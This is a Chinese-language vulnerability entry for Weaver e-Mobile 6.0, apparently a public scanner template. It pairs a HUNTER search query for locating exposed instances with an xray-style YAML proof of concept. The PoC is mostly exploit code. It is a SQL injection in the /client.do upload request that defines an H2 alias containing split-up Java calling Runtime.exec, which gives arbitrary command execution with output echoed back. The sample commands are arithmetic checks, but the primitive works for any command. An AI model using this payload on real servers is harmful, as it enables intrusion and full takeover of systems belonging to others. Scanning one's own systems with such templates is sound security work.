漏洞描述
泛微 e-Mobile 6.0 存在命令执行漏洞,攻击者可通过在输入中添加特殊字符或命令来序列欺骗应用程序将其作为有效命令去执行,从而获取服务器的执行权限。
HUNTER: app.name="泛微 e-mobile OA"
e-mobile-6.0-client-rce: 泛微 e-Mobile 6.0 命令执行
PoC代码[已公开]
id: e-mobile-6.0-client-rce
info:
name: 泛微 e-Mobile 6.0 命令执行
author: TryA9ain
severity: high
verified: true
description: |
泛微 e-Mobile 6.0 存在命令执行漏洞,攻击者可通过在输入中添加特殊字符或命令来序列欺骗应用程序将其作为有效命令去执行,从而获取服务器的执行权限。
HUNTER: app.name="泛微 e-mobile OA"
reference:
- https://mp.weixin.qq.com/s/z-WN2_MTxdk3z4LvchXkXw
tags: e-Mobile,fanwei
created: 2023/08/22
set:
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /client.do
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"method\"\r\n\
\r\n\
getupload\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"uploadID\"\r\n\
\r\n\
1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass(\"com.caucho.server.dispatch.ServletInvocation\").getMet','hod(\"getContextRequest\").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField(\"_response\");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod(\"getWriter\");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter(\"\\A\");writer.write(scan','ner.hasNext()?sca','nner.next():\"\");}');CALL MzSNqKsZTagmf('cmd.exe /c set /a 41372*43219');--\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(bytes(string(41372 * 43219)))
r1:
request:
method: POST
path: /client.do
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"method\"\r\n\
\r\n\
getupload\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"uploadID\"\r\n\
\r\n\
1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass(\"com.caucho.server.dispatch.ServletInvocation\").getMet','hod(\"getContextRequest\").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField(\"_response\");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod(\"getWriter\");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter(\"\\A\");writer.write(scan','ner.hasNext()?sca','nner.next():\"\");}');CALL MzSNqKsZTagmf('expr 41358 \\* 43421');--\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(bytes(string(41358 * 43421)))
expression: r0() || r1()